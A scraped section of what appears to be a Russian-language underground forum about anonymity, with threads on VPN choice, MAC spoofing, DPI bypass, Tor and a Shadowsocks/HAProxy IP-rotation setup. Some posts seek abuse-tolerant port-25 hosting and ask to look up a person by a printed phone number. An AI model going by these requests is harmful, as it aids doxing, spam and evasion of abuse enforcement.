Контакты для связи: @Socks53

OVPN+Stunnel или WireGuard?

ID: 676533bbb4103b69df371ce6
Thread ID: 36401
Created: 2020-04-16T07:50:52+0000
Last Post: 2020-04-16T09:28:40+0000
Author: kosok11
Replies: 1 Views: 1K

Собственно сабж.
У кого какие мысли по поводу этих двух вариантов?
То, что WG однозначно выигрывает по скорости - понятно, но как на счет безопасности?

Смена (подмена) MAC-address на ПК

ID: 676533bbb4103b69df371cf2
Thread ID: 36054
Created: 2020-04-03T18:37:04+0000
Last Post: 2020-04-10T18:37:33+0000
Author: tabac
Replies: 3 Views: 1K

Смена (подмена) MAC-address на ПК

Как многие наверно знают, IP это лишь поверхностный метод идентификации.
Есть более коварный враг анонимности - MAC-address
Он прочно "вбит" в сетевую карту ПК и по сути для идентификации служит как паспорт.
Так же это распространяется и на Wi-Fi роутер.

И проблема была бы критичной, если бы не разработка одного программиста из Индии.
Программа бесплатная.
Только на английском.
На скрине постарался доходчиво показать значения команд (кнопок)
Проверка на VT
Ссылка на софт - ТЫЦ

Ну и уж кому в облом соскользнуть с форума на сайт, цитирую содержание здесь:

Technitium MAC Address Changer позволяет вам мгновенно изменять (обманывать) адрес управления доступом к среде (MAC) вашего сетевого интерфейса (NIC). Он имеет очень простой пользовательский интерфейс и предоставляет достаточную информацию о каждом сетевом адаптере в машине. Каждый сетевой адаптер имеет MAC-адрес, жестко закодированный в его цепи изготовителем. Этот жестко закодированный MAC-адрес используется драйверами окон для доступа к сети Ethernet (LAN). Этот инструмент может установить новый MAC-адрес для вашего сетевого адаптера, минуя исходный MAC-адрес с жестким кодированием. Technitium MAC Address Changer является обязательным инструментом в каждом окне инструментов для профессионалов.

Особенности
Работает в Windows 10, 8 и 7 для 32-разрядных и 64-разрядных.
Расширенные настройки конфигурации сети с поддержкой IPv6 позволяют быстро переключаться между сетевыми конфигурациями.
Позволяет полностью конфигурировать любой сетевой адаптер.
Параметры командной строки с доступными функциональными возможностями программного обеспечения. Вы можете выбрать предустановку из указанного предварительно заданного файла для непосредственного применения.
Обновление списка поставщиков сетевых карт позволяет загружать последние данные поставщика (OUI) с IEEE.org.

Как это работает?
Это программное обеспечение просто записывает значение в реестр Windows. Когда устройство сетевого адаптера включено, окна выполняют поиск значения реестра «NetworkAddress» в ключе HKEY_LOCAL_MACHINE \ SYSTEM \ CurrentControlSet
Control \ Class \ {4D36E972-E325-11CE-BFC1- 08002bE10318} \ [ID сетевого адаптера, например 0001]. Если значение присутствует, окна будут использовать его как MAC-адрес, если нет, окна будут использовать MAC-адрес, запрограммированный изготовителем с жестким кодированием. У некоторых драйверов сетевого адаптера это средство встроено. Его можно найти на вкладке «Предварительные настройки» в свойствах устройства сетевого адаптера в диспетчере устройств Windows.

Как изменить MAC-адрес
Начальный MAC-чейнджер перечислит все доступные сетевые адаптеры.
Выберите адаптер, который вы хотите изменить MAC-адрес. Ниже вы получите информацию о своем выборе.
На вкладке «Информация» найдите рамку «Изменить MAC-адрес». Введите новый MAC- адрес в поле и нажмите «Изменить сейчас»! кнопка. Вы даже можете нажать кнопку «Случайный MAC-адрес», чтобы заполнить случайно выбранный MAC-адрес из списка поставщиков.
Чтобы восстановить исходный MAC-адрес сетевого адаптера, выберите адаптер, нажмите кнопку «Восстановить оригинал» в рамке «Изменить MAC-адрес».

ПРИМЕЧАНИЕ. Этот инструмент не может изменять MAC-адрес сетевого моста Microsoft. Сетевой мост автоматически использует исходный MAC-адрес первого сетевого адаптера.

автор @ cagy

VPN WireGuard

ID: 676533bbb4103b69df371cf4
Thread ID: 35896
Created: 2020-03-31T11:54:28+0000
Last Post: 2020-04-01T10:02:52+0000
Author: INC.
Replies: 1 Views: 1K

VPN WireGuard 1.0.0

Представлен знаковый выпуск VPN WireGuard 1.0.0, который отметил собой поставку компонентов WireGuard в основном составе ядра Linux 5.6 и стабилизацию разработки. Включённый в состав ядра Linux код прошёл дополнительный аудит безопасности, выполненный независимой фирмой, специализирующейся на подобных проверках. Аудит не выявил каких-либо проблем.

Так как WireGuard теперь развивается в основном составе ядра Linux, для дистрибутивов и пользователей, продолжающих использование старых версий ядра, подготовлен репозиторий wireguard-linux-compat.git. Репозиторий включает бэкпортированный код WireGuard и слой compat.h для обеспечения совместимости со старыми ядрами. Отмечается, что пока есть возможность разработчиков и потребность у пользователей обособленный вариант патчей будет поддерживаться в рабочем виде. В текущем виде обособленный вариант WireGuard может использоваться с ядрами из Ubuntu 20.04 и Debian 10 "Buster", а также доступен в виде патчей для ядер Linux 5.4 и 5.5. Дистрибутивы, применяющие самые свежие ядра, такие как Arch, Gentoo и Fedora 32, получат возможность использования WireGuard вместе с обновлением ядра 5.6.

Основной процесс разработки теперь ведётся в репозитории wireguard-linux.git, включающем полное дерево ядра Linux с изменениями от проекта Wireguard. Патчи из данного репозитория будут рецензироваться для включения в основное ядро и регулярно переноситься в ветки net/net-next. Разработка запускаемых в пространстве пользователя утилит и скриптов, таких как wg и wg-quick, ведётся в репозитории wireguard-tools.git, который можно использовать для создания пакетов в дистрибутивах.

Напомним, что VPN WireGuard реализован на основе современных методов шифрования, обеспечивает очень высокую производительность, прост в использовании, лишён усложнений и хорошо зарекомендовал себя в ряде крупных внедрений, обрабатывающих большие объёмы трафика. Проект развивается с 2015 года, прошёл аудит и формальную верификацию применяемых методов шифрования. Поддержка WireGuard уже интегрирована в NetworkManager и systemd, а патчи для ядра входят в базовый состав дистрибутивов Debian Unstable, Mageia, Alpine, Arch, Gentoo, OpenWrt, NixOS, Subgraph и ALT.

В WireGuard применяется концепция маршрутизации по ключам шифрования, которая подразумевает привязку к каждому сетевому интерфейсу закрытого ключа и применение для связывания открытых ключей. Обмен открытыми ключами для установки соединения производится по аналогии с SSH. Для согласования ключей и соединения без запуска отдельного демона в пространстве пользователя применяется механизм Noise_IK из Noise Protocol Framework, похожий на поддержание authorized_keys в SSH. Передача данных осуществляется через инкапсуляцию в пакеты UDP. Поддерживается смена IP-адреса VPN-сервера (роуминг) без разрыва соединения с автоматической перенастройкой клиента.

Для шифрования используется потоковый шифр ChaCha20 и алгоритм аутентификации сообщений (MAC) Poly1305, разработанные Дэниелом Бернштейном (Daniel J. Bernstein), Таней Ланге (Tanja Lange) и Питером Швабе (Peter Schwabe). ChaCha20 и Poly1305 позиционируются как более быстрые и безопасные аналоги AES-256-CTR и HMAC, программная реализация которых позволяет добиться фиксированного времени выполнения без задействования специальной аппаратной поддержки. Для генерации совместного секретного ключа применяется протокол Диффи-Хеллмана на эллиптических кривых в реализации Curve25519, также предложенной Дэниелом Бернштейном. Для хеширования используются алгоритм BLAKE2s (RFC7693).

При старом тестировании производительности WireGuard продемонстрировал в 3.9 раза более высокую пропускную способность и в 3.8 раз более высокую отзывчивость, по сравнению с OpenVPN (256-bit AES c HMAC-SHA2-256). По сравнению с IPsec (256-bit ChaCha20+Poly1305 и AES-256-GCM-128) в WireGuard наблюдается небольшое опережение по производительности (13-18%) и снижение задержек (21-23%). Размещённые на сайте проекта результаты тестирования охватывают старую обособленную реализацию WireGuard и отмечены как недостаточно качественные. Со времени проведения тестов код WireGuard и IPsec был дополнительно оптимизирован и теперь работает быстрее. Более полное тестирование, охватывающее интегрированную в ядро реализацию, пока не проведено. Тем не менее, отмечается, что WireGuard в некоторых ситуациях по- прежнему обгоняет IPsec в силу многопоточности, в то время как OpenVPN остаётся очень медленным.

• Source: https://www.wireguard.io/

• Source: https://lists.zx2c4.com/pipermail/wireguard/2020-March/005206.html

• Аудит: https://lore.kernel.org/netdev/20200319003047.113501-1-Jason@zx2c4.com/

Отключить spy neo(помощь)

ID: 676533bbb4103b69df371d04
Thread ID: 33525
Created: 2019-11-28T13:03:21+0000
Last Post: 2019-11-28T13:03:21+0000
Author: lssis
Replies: 0 Views: 1K

Ребят, может кто в курсе , как отключить spy neo(шпион) в Win10

Looking for Configure A Virtual Machine with Tor Router

ID: 676533bbb4103b69df371d08
Thread ID: 33315
Created: 2019-11-20T11:46:52+0000
Last Post: 2019-11-21T05:36:00+0000
Author: 3r05
Replies: 2 Views: 1K

Looking for configure a tor router vm Machine for malware testing and reversing can anyone suggest me how to do it ?

Возможно ли безопасно заблокировать свою операционную систему?

ID: 676533bbb4103b69df371d09
Thread ID: 32843
Created: 2019-10-30T20:48:19+0000
Last Post: 2019-11-20T17:21:56+0000
Author: kokoko
Replies: 4 Views: 1K

На компьютере установлена операционная система Windows, сам винчестер зашифрован.
Не всегда бывает удобно выключать компьютер когда от него отходишь, куда было бы проще на время заблокировать его, чтобы разблокировать можно было только по паролю, и максимально безопасно.
Очевидно, что встроенный блокировщик учетной записи (Win+L) безопасным не является.
Смысл идеи, допустим, переключаем компьютер в режим гибернации, а чтобы выйти из него, потребуется пароль, который и расшифрует сброшенный на диск дамп оперативной памяти, и вернет его обратно в память.
Есть ли что нибудь подобное секьюрное под Windows или Linux?

VPS/VDS OPEN 25 PORT

ID: 676533bbb4103b69df371d0b
Thread ID: 33107
Created: 2019-11-09T20:28:56+0000
Last Post: 2019-11-19T10:05:16+0000
Author: m0sad
Replies: 1 Views: 1K

подскажите хостеров желательно с посуточной оплаты до первой абузы

socks proxy

ID: 676533bbb4103b69df371d0f
Thread ID: 33080
Created: 2019-11-08T11:43:15+0000
Last Post: 2019-11-08T12:05:11+0000
Author: FaIIen
Replies: 1 Views: 1K

[CLIKE]

[ UPLOAD.EE - Proxy_List__7449_.txt - Download

](https://www.upload.ee/files/10698049/Proxy_List__7449_.txt.html?msg=sess_error)

Proxy_List__7449_.txt - Download. Upload.ee

www.upload.ee

[/CLIKE]

Есть русские чистые прокси?

ID: 676533bbb4103b69df371d14
Thread ID: 32855
Created: 2019-10-31T09:06:30+0000
Last Post: 2019-10-31T13:34:25+0000
Author: 2c71e9
Replies: 3 Views: 1K

Короче мы все анонимусы дохера, но иногда хочется после дикой работы, посмотреть сериальчик какой нибудь, который доступен только из РУ. А все нормальное провайдеры впн уехали из ру после законов, тор айпи все забанены. Короче суть проблемы, есть у нас какие нибудь статичные прокси в стране, пусть даже логи пишут) Чисто чтобы скорость была хорошая. Я не говорю сейчас про БК соксы.

P.S. внимание, для читающих тему, если вдруг тут будут айпи предоставлены, это может быть подлог, поэтому пользуйтесь всегда торами и другой херней в целочке. ^_^

Микровопрос по OS Whonix

ID: 676533bbb4103b69df371d17
Thread ID: 32702
Created: 2019-10-24T14:43:34+0000
Last Post: 2019-10-24T15:14:17+0000
Author: SangriaBlood
Replies: 1 Views: 1K

Обязательно ли во всех новых установленных программах прописывать Whonix'овские порты? Или трафик однох*йственно не сможет уйти налево через виртуальный адаптер между виртуалками и так или иначе пойдет через нужные порты?
Просто читаю про установку программ на данную ось, и одни и те же программы ставят по разному, ге то говорят обязательно прописывать порты в настройках коннекта у проги а кто то забивает болт.

Линки на прокси листы

ID: 676533bbb4103b69df371d1c
Thread ID: 32476
Created: 2019-10-13T21:54:07+0000
Last Post: 2019-10-13T23:54:33+0000
Author: JooJ
Replies: 1 Views: 1K

Доброго времени суток!
Необходимо регулярно искать очень большое количество прокси
Нужно найти актуальные ссылки на проксилисты для парсеров

Анонимность и Безопасность ч1 - Хост

ID: 676533bbb4103b69df371d1d
Thread ID: 32457
Created: 2019-10-12T20:20:15+0000
Last Post: 2019-10-12T20:20:15+0000
Author: Benihowy
Replies: 0 Views: 1K

Доброго времени суток. Все глубже и глубже проникает интернет в нашу жизнь. Лет 15 назад, когда я близко познакомился с интернетом, и представить не мог, что сейчас даже пожилые люди будут зависеть от него как «дети от соски». А что говорить про современную молодёжь? Первый класс, и уже с телефонами. Как вспоминаю свою начальную школу, сложно было представить мобильный телефон у одноклассника, а если и был, то у папы брали что бы похвастаться. Сейчас наоборот, сложно найти ребенка, у которого нету телефона. Та и телефоном сложно назвать это устройство. Мини-компьютер.

В связи с ростом доступности интернета, появились компании, которые работают через него. Продают или покупают, дают в аренду и тд. Есть и такие, которые торгуют данными полученными от пользователей интернета. Вы скажите, что это противозаконно? Как бы да, с точки зрения морали, а вот государство их полностью поддерживает. Интересным человеком для меня стал Артур Хачуян. Он создал свою компанию и собирает данные, а после анализирует с открытых источников (конечно, если верить его словам). Как-то в Москве, помню, был провайдер, который тарифы ставил дешевле своих конкурентов. Некто не мог понять подвоха, но после фсб сказали, они осуществляли перехват трафика (человек по середине). Некогда не знаешь, что можешь ждать от окружающих, поэтому некому нельзя доверять.

Итак, читатель, раз ты на этом форуме, тебя интересует анонимность и безопасность. Преступим. Большинство людей задумалось в 2014 году, когда Сноуден слил информацию касательную АНБ. И массово побежали в тор, впн, прокси да бы защитится от слежки. Люди в надежде качали что угодно, no-name vpn’ны, которые выполняли одну из возложенных на них функций – маршрутизация, а другую – это троян. Потом пошли всякие шифровальщики-вымогатели. Ужас просто. Как только миллионы информационно неграмотных людей наступали на одни и те же грабли.
Мною был разработан метод, противодействия почти любых угроз из вне. Почему почти? Потому что слабым звеном является человек. Моя система работает длительный период, менялось железо, увеличивалось количество машин, но ПО и алгоритм - не измены.

Самое главное на любой машине является информация на хранителе информации. Она бесценна, а в чужих руках может быть крайне опасна. К ней нужно ограничивать доступ, но стоит не закапывать диски в землю, что бы к ним третьи лица не получили доступ. Стоит оценить ситуацию. Если человек живет сам, не нужно прятать диски, под кровать (там будут искать в первую очередь). Я сторонник прятать на виду. К примеру, я бы спрятал очень важную инфу в мессенджере телеграм вместе с разнообразным контентом. Предварительно запаковав ее трукриптом. И при необходимости скачивал ее. Естественно, телеграм не должен быть зарегистрирован на ваш реальный мобильный номер. Почему телеграм? Он безграничный по трафику, объёму, одно лишь ограничение – размер файла должен иметь 1.4гб (точно не помню), иногда придется бить на части файлы.

Но если у вас не настолько важная информация. Простые фотки, видео семьи. И вам совсем не хочется увидеть загрузчик шифровальщика при старте или что бы они попали в чужие руки. Нужно как-то обезопасить себя. Речь пойдет про виртуальные машины. Почему? Только они могут гарантировать ограничение несанкционированного доступа при захвате виртуальной машины злоумышленником. Я буду вести речь про прекрасный гипервизор от микрософта – hyper-v (не стану расcказывать про плюсы, кому интересно, тот найдет). Я нечего не имею против других, сам сидел на vmware. Суть заключается в следующем, нужно по максимуму ограничить взаимодействие операционной системе на хосте (реальной машины) с интернетом и критически опасными машинами (роутеры имеющие выход в интернет). Не в коем случае на хосте не стоит давать настройки сетевому адаптеру, который подключается к модему провайдера.

Нужно создать подключение в разделе виртуальные коммутаторы. Это создает синтетический виртуальный адаптер в виртуальной машине и «подключает» его к реальной сетевой карте, словно через коммутатор.

В следующей статье рассмотрим виртуальную машину, которая смотрит в две стороны, интернет и домашняя сеть.

Кто может расшифровать?

ID: 676533bbb4103b69df371d20
Thread ID: 32382
Created: 2019-10-10T08:21:05+0000
Last Post: 2019-10-10T11:27:22+0000
Author: Flaz
Replies: 2 Views: 1K

/del

Инструкция по настройке своего VPN от VektorT13

ID: 676533bbb4103b69df371d22
Thread ID: 31342
Created: 2019-08-26T17:08:23+0000
Last Post: 2019-10-06T12:20:02+0000
Author: tabac
Replies: 1 Views: 1K

Полная инструкция по настройке своего VPN от VektorT13.
Разберется даже новичок.

Скачать и посмотреть видео можно тут:
https://mega.nz/#!BYk2RAbR!TmpE9vRycy1hlTrVtaHj76XVIslOR3Rcq9b43o9emu8

Или на ютубе:

Ссылки из видео:
Облачная платформа - https://m.do.co/c/1b4ae42ec30b
ГитХаб - https://github.com/vektort13
Putty - https://the.earth.li/~sgtatham/putty/latest/w64/putty.exe
WinSCP - https://winscp.net/download/WinSCP-5.15.3-Setup.exe
OpenVPN - <https://swupdate.openvpn.org/community/releases/openvpn- install-2.4.7-I607-Win10.exe>

Socks/proxy расширение под Chrome

ID: 676533bbb4103b69df371d25
Thread ID: 31984
Created: 2019-09-23T13:23:40+0000
Last Post: 2019-09-23T14:14:35+0000
Author: pablo
Replies: 3 Views: 1K

Подскажите нормальное работающее Socks/proxy расширение под Chrome
в последнее время попадаю только на глючащее г*вно, то не грузится, то после апдейта перестает работать, то теряет связь внезапно

You will go to jail

ID: 676533bbb4103b69df371d26
Thread ID: 31967
Created: 2019-09-23T03:31:48+0000
Last Post: 2019-09-23T03:31:48+0000
Author: mertviyT
Replies: 0 Views: 1K

Видео по безопасности, которое должен посмотреть каждый.

Ах да, если вы на этом форуме не с тора, почта не левая, в принципе можете не смотреть )

Анти скам или временная почтаv

ID: 676533bbb4103b69df371d2b
Thread ID: 31894
Created: 2019-09-19T01:26:29+0000
Last Post: 2019-09-19T01:26:29+0000
Author: xxSadxx
Replies: 0 Views: 1K

Все уже наверно знакомы с сервисом ep mi или же с временной почтой. Суть этих сервисов проста - они выдают временную одноразовую почту. Временная почта защищает вашу основную почту от:

Спама

Фишинга

Рекламных рассылок

Если вам нужна одноразовая почта на один раз вы можете зайди на сайт, и получить вашу временную почту. Если же вы планируете постоянно использовать временную почту рекомендую вам установить расширение на ваш браузер. Если вы установите расширение вы сможете почти каждую секунду менять почту. Желаю удачи. Оставайтесь анонимными.

[CLIKE]

Spoiler: Сайт

https://temp-mail.org/ru/

Spoiler: Расширение для Google Chrome

[https://chrome.google.com/webstore/detail/temp-mail-disposable- temp/inojafojbhdpnehkhhfjalgjjobnhomj?hl=ru](https://chrome.google.com/webstore/detail/temp- mail-disposable-temp/inojafojbhdpnehkhhfjalgjjobnhomj?hl=ru)

Spoiler: Расширение для Opera

<https://addons.opera.com/ru/extensions/details/temp-mail-disposable- temporary-email/>

Spoiler: Расширение для mozila/firefox

https://addons.mozilla.org/ru/firefox/addon/temp-mail/

[/CLIKE]

Spoiler: Для админинстарторов

Hidden content for users named 500mhz, admin, Quake3, weaver.

Кто может пробить по номеру?

ID: 676533bbb4103b69df371d2e
Thread ID: 31759
Created: 2019-09-15T00:41:19+0000
Last Post: 2019-09-15T00:41:19+0000
Author: GunQuest
Replies: 0 Views: 1K

Срочно нужна любая информация по номеру +79025689144

В бомбер кидать не надо.

Динамический IP адрес своими руками (Shadowsocks + HAProxy)

ID: 676533bbb4103b69df371d3a
Thread ID: 30954
Created: 2019-08-10T18:11:52+0000
Last Post: 2019-08-10T18:11:52+0000
Author: Akasuki_Takahash
Replies: 0 Views: 1K

Привет парни, накидал не большой порядок действий как завести у себя на серверах ротатор IP адресов в связке с Shadowsocks. Берем 1 сервер под ротатор (HAProxy) остальные сервера под выход.

- Сервер выхода (Shadowsocks) проверял на Ubuntu 18.04 - 19.04 работает без проблем:

Code:Copy to clipboard

apt update && apt upgrade -y && apt install software-properties-common nano git -y && apt update && apt install shadowsocks-libev resolvconf -y && echo '{ "server":"'$(dig +short myip.opendns.com @resolver1.opendns.com)'", "server_port":443, "password":"ВАШ ПАРОЛЬ", "timeout":30, "method":"aes-256-ctr", "mode": "tcp_and_udp", "dns": "8.8.8.8" }' > /etc/shadowsocks-libev/config.json && echo 1 > /proc/sys/net/ipv4/icmp_echo_ignore_all && echo net.ipv4.icmp_echo_ignore_all=1 >> /etc/sysctl.conf && echo nameserver 8.8.8.8 >> /etc/resolvconf/resolv.conf.d/head && resolvconf --enable-updates && resolvconf -u && systemctl disable systemd-resolved && sysctl -p && systemctl enable shadowsocks-libev.service && systemctl restart shadowsocks-libev && systemctl status shadowsocks-libev && clear && echo DONE! SERVER IP:PORT - "$(dig +short myip.opendns.com @resolver1.opendns.com)":443

Меняете пароль на свой, и вставляете весь этот текст в консоль, по итогу получите сообщение DONE! SERVER IP:PORT сохраняете, далее еще допустим на 2 серверах производите тоже самое.

- Сервер ротатор (HAProxy) делаем все по порядку:

Ставим пакеты HAProxy:

Code:Copy to clipboard

apt update && apt upgrade -y && apt install haproxy -y

Открываем конфиг:

Code:Copy to clipboard

nano /etc/haproxy/haproxy.cfg

В конфиги вставляем это там где "IP СЕРВЕРА РОТАТОРА:443" вставляете IP текущего сервера, ниже провисывайте "IP СЕРВЕРА ВЫХОДА:PORT" сервера которые вы заранее приготовили:

Code:Copy to clipboard

global ulimit-n 51200 defaults mode tcp timeout connect 5m timeout client 10m timeout server 5m frontend ss-in bind IP СЕРВЕРА РОТАТОРА:443 default_backend ss-out backend ss-out balance roundrobin server server0 IP СЕРВЕРА ВЫХОДА:PORT server server1 IP СЕРВЕРА ВЫХОДА:PORT server server2 IP СЕРВЕРА ВЫХОДА:PORT server server3 IP СЕРВЕРА ВЫХОДА:PORT

Запускаем сам ротатор:

Code:Copy to clipboard

systemctl enable haproxy && systemctl restart haproxy && systemctl status haproxy

- Все готово, у вас есть прокси через прокладку, динамический IP адрес который постоянно изменяется. Теперь чтобы подключится и начать использовать это идем на сайт https://shadowsocks.org качаем клиент, вписываем IP ротатора HAProxy, вписываем пароль и добро пожаловать в интернет.

ipv6

ID: 676533bbb4103b69df371d3f
Thread ID: 30441
Created: 2019-07-16T05:23:25+0000
Last Post: 2019-07-16T07:11:48+0000
Author: Nil$
Replies: 2 Views: 1K

Мудрейшие, созрел такой вопрос - как сделать внешний ipv6 ?
Перелопатил кучу утечек, редко когда на форумах и сайтах хранится сабж. Обычно ipv4.
Собственно как легко реализовать , если пров дает 4 динамику.
Оптимально на роутере.

Разговоры о DPI

ID: 676533bbb4103b69df371d51
Thread ID: 29533
Created: 2019-05-27T16:50:16+0000
Last Post: 2019-05-27T16:50:16+0000
Author: pablo
Replies: 0 Views: 1K

![](/proxy.php?image=https%3A%2F%2Fsecurebox.comodo.com%2Ftheme%2Fimages%2Fdeep- packet-inspection.jpg&hash=3113de4ae6585364358a8052a13d97d8)

К сожалению, VPN/Tor/socks, в чистом виде - все эти средства могут оказаться бесполезными, если твой провайдер начал блокировки с применением DPI (Deep Packet Inspection) — системы глубокого анализа сетевого трафика. Цель DPI — отбрасывать все, что не похоже на работу обычного человека за обычным компьютером, то есть блокировать любую подозрительную активность. А все способы анонимизации трафика априори подозрительны, поэтому программы зачастую дают сбои или в принципе отказываются работать.

Но и с этим можно бороться. Почти для каждой из описанных возможностей защищать канал связи есть надстройки, помогающие обходить зоркое око анализаторов DPI. Например, Shadowsocks имеет встроенную защиту от DPI и притворяется, что выполняет обычное подключение к удаленному серверу.

OpenVPN сам по себе легко различим, но stunnel позволяет также обойти анализ пакетов. Stunnel маскирует канал VPN под соединение SSL, которое с виду безобидно: это может быть и простой браузер, который обращается к сайту по HTTPS. Благодаря этому заблокировать такой туннель непросто. Если перестараться, можно заблокировать вообще все.

Обходить DPI также помогает tls-crypt , режим, введенный в версии OpenVPN 2.4, который шифрует трафик VPN.

Создатели Tor Browser специально работают над обходом средств анализа DPI. При подключении к сети Tor можно воспользоваться транспортом-прослойкой, которая обеспечивает беспрепятственное подключение к первому серверу защищенной сети. Этот транспорт можно либо выбрать из списка (это общедоступные серверы), либо получить персональный на официальном сайте Tor Bridges.

Лучше всего себя показывает obfs4 — это обфускатор, перемешивающий передаваемые данные так, что в Сети их нельзя определить. DPI обычно пропускает такие пакеты, поскольку не может предположить, что находится внутри.

Еще есть несколько программ, которые пытаются тем или иным способом обмануть анализ пакетов, например разбивая их на мелкие части или меняя заголовки. В их числе GoodbyeDPIили Green Tunnel с простым графическим интерфейсом — они не скрывают ни IP, ни данные, но обходят блокировку.

Кардинальным решением можно считать проект Streisand, его русское описание есть на [GitHub](https://github.com/StreisandEffect/streisand/blob/master/README- ru.md). Это палочка-выручалочка в мире безопасности данных. Эта утилита всего за несколько минут развертывает и настраивает на удаленном сервере сразу несколько сервисов для защиты данных, а также дает подробную инструкцию по ним.

Вышел полноценный TOR на Andriod

ID: 676533bbb4103b69df371d53
Thread ID: 29471
Created: 2019-05-23T15:58:35+0000
Last Post: 2019-05-23T15:58:35+0000
Author: pablo
Replies: 0 Views: 1K

Официально: вышел полноценный TOR на Andriod

Добрый вечер, господа! С радостью можем сообщить, что Tor Project выпустил релизную версия Tor Browser для Android устройств. Мобильный TOR работает на базе всем известного Firefox и это уже полноценный удобный браузер. Весь даркнет прямо у вас в кармане.

Напомним, что ранее для доступа к onion сайтам с мобильных устройств на зеленом роботе, приходилось использовать не очень удобную связку из Orbot + OrFox. Сейчас для этого достаточно установить всего одно приложение. Судя по отзывам на Google Play все работает стабильно и быстро.

Важные нюансы:
• С сентября 2018 года разработчики тестировали альфа-версию. Отмечается, что с тех пор была проделана большая работа, чтобы к выпуску стабильной версии приложения обеспечить должный уровень безопасности.
• В Tor Project объяснили, что в плане функциональности десктопная версия Tor все еще опережает версию для Android, но мобильный Tor Browser обеспечивает почти тот же уровень защиты, что и полноценная версия.
• Разработчики уточнили, что официального браузера Tor нет в App Store из-за ограничений Apple. Они порекомендовали пользователям iOS Onion Browser, созданный Майком Тигасом.

Скачать Tor Browser в Google Play
Проверить pgp подписи можно тут: https://www.torproject.org/download/#android

tor-browser-8.5-android-x86-multi.apk.asc

Code:Copy to clipboard

-----BEGIN PGP SIGNATURE----- iQIcBAABCgAGBQJc5AC9AAoJEOt3RJHZ/wbiLHMQAJPTK6Wk+3L7fkotoYCe7MCX sm8YNh/XrX9cNRMUrtMES2Mb9C9BY/65MeesgZZmSn3hYrSw/4wHFMcS2n9ZfFzK 7SkO8WBvdrVvqEjTIYGamXO9D2OJutVG8Q2XOsKvk/NL9zSqJx0P7aNEnztPlEnz yLSqfkFWe3NRqAieuqZQnuL+NbP8K2DjuWcULH/VA+/Z47RvnczNeRp87Rjy2RNq WNaR5SOpwzTb6QhJJZANdgHWCi6OxtZcGDmfIMltaf2sUsy1daBlcKxA9n+U2rJy 54/OlL3A/92VEmaFFKlVt/duVYbaehKCpKUqxu0lfDu15Do28JH5kGbrSUuDzrN6 PuswvfJwZ9cCuDLjTHsqssw1NTrkxKprWS5F/I13Hcv+I0IZU1VlijTovmtMs8Qx Le0u3u9cDSaL+fa+LGgZmNdzJb8M7+qj1xxYMz343wrz5G4+5bbHPjrSmZY2I/e0 f5NH1AucHn4jTypS0i279FI1A74cQV+e9pM/eUoR2hzmFSoXI9iboRi1YpKF8PdQ CUUsEFDvezOts8N4NXkas0nhZCaTst2/oB0X3db1lPRjolieKJnDi412ENDdfwRY bbwb7pZZs38DOsXNkUoclJYsI8qdkq1ymLPvUHJWJg4QIGPMLcf/u2PVHt3Amf81 tzrkCPhmoM/Pd7eBs84B =bdbZ -----END PGP SIGNATURE-----

Устанавливаем Parrot Security OS в VirtualBox.

ID: 676533bbb4103b69df371d54
Thread ID: 29469
Created: 2019-05-23T14:28:29+0000
Last Post: 2019-05-23T14:28:29+0000
Author: SEAdm1n
Replies: 0 Views: 1K

Вышла новая версия дистрибутива Parrot 4.6 , основанного на пакетной базе Debian Testing и включающего подборку инструментов для проверки защищённости систем, проведения криминалистического анализа и обратного инжиниринга.

Дистрибутив Parrot позиционируется как переносная лаборатория с окружением для экспертов по безопасности и криминалистов️‍, основное внимание в которой уделяется средствам для проверки облачных систем и устройств интернета-вещей.

В состав также включены:
Криптографические инструменты и программы обеспечения защищённого выхода в сеть, в том числе предлагаются TOR, I2P, anonsurf, gpg, tccf, zulucrypt, veracrypt, truecrypt и luks. Также присутствуют профили AppArmor и Firejail, применяемые для запуска приложений в режиме изоляции от остальной системы.

Spoiler: Читать

[ Redirecting... ](https://tgraph.io/Ustanavlivaem-Parrot-Security-OS-v- VirtualBox-05-01)

GoodbyeDPI

ID: 676533bbb4103b69df371d55
Thread ID: 29422
Created: 2019-05-20T17:53:27+0000
Last Post: 2019-05-20T17:53:27+0000
Author: NyanCat
Replies: 0 Views: 1K

Штука довольно полезная, подробнее читать здесь сама штука наGithub

Создание полностью невидимой и защищённой папки

ID: 676533bbb4103b69df371d56
Thread ID: 29383
Created: 2019-05-18T16:22:46+0000
Last Post: 2019-05-18T16:22:46+0000
Author: PumpTheGun
Replies: 0 Views: 1K

Шаг 1: Создайте новую папку (щелкните правой кнопкой мыши -> Создать -> Папка) и дайте ей любое имя по вашему выбору. Например, мы назовём её ABС.
Шаг 2: Теперь поместите в эту папку все важные файлы, документы или любые папки, которые вы хотите защитить паролем.
Шаг 3: Щелкните правой кнопкой мыши на этой папке (ABC) и выберите опцию «Отправить» -> «Сжатая ZIP-папка».
Шаг 4: Теперь создается новая сжатая ZIP-папка в следующей папке (ABC) с тем же именем.
Шаг 5: Дважды щелкните эту сжатую ZIP-папку, и здесь вы увидите свою исходную папку (ABC).
Шаг 6: Теперь перейдите вменю «Файл» и выберите вариант «Установить пароль по умолчанию» («Файл -> Добавить пароль» )
Теперь появится небольшое окно, и здесь вы можете установить желаемый пароль. Как только пароль будет установлен, папка будет запрашивать пароль при каждом открытии. Таким образом, вы создали папку, защищенную паролем.
Как сделать папку невидимой?
Шаг 1: Щелкните правой кнопкой мыши эту папку, защищенную паролем, и выберите « Свойства» .
Шаг 2: В нижней части выберите параметр «Скрытый» и нажмите «ОК». Ваша папка становится невидимой (скрытой).
Шаг 3: Чтобы отобразить эту папку, перейдите в раздел «Мой компьютер» ->«Инструменты» -> «Папка» . Перейдите на вкладку «Просмотр», прокрутите вниз и в разделе «Скрытые файлы и папки» вы увидите следующие два варианта:

Не показывать скрытые файлы и папки.

Показать скрытые файлы и папки.

Выберите второй вариант и нажмите OK. Теперь невидимая папка становится видимой в ее местоположении. Чтобы получить доступ к нему, вам нужен пароль. Чтобы снова сделать её невидимой, повторите шаг от -1 до шага-3 выберите первый вариант и нажмите «ОК». Теперь папка снова становится невидимой.

AntiOS v1.0.2 GUI

ID: 676533bbb4103b69df371d57
Thread ID: 29192
Created: 2019-05-07T15:28:35+0000
Last Post: 2019-05-07T15:28:35+0000
Author: pablo
Replies: 0 Views: 1K

AntiOS v1.0.2 GUI

Скачать:

You must have at least 15 message(s) to view the content.

Нужен сервис аренды ру номера

ID: 676533bbb4103b69df371d5a
Thread ID: 29033
Created: 2019-04-29T08:49:24+0000
Last Post: 2019-04-29T08:49:24+0000
Author: CEEED777
Replies: 0 Views: 1K

Всегда юзал одну конторку, но что то у них 3 день пусто с номерами.
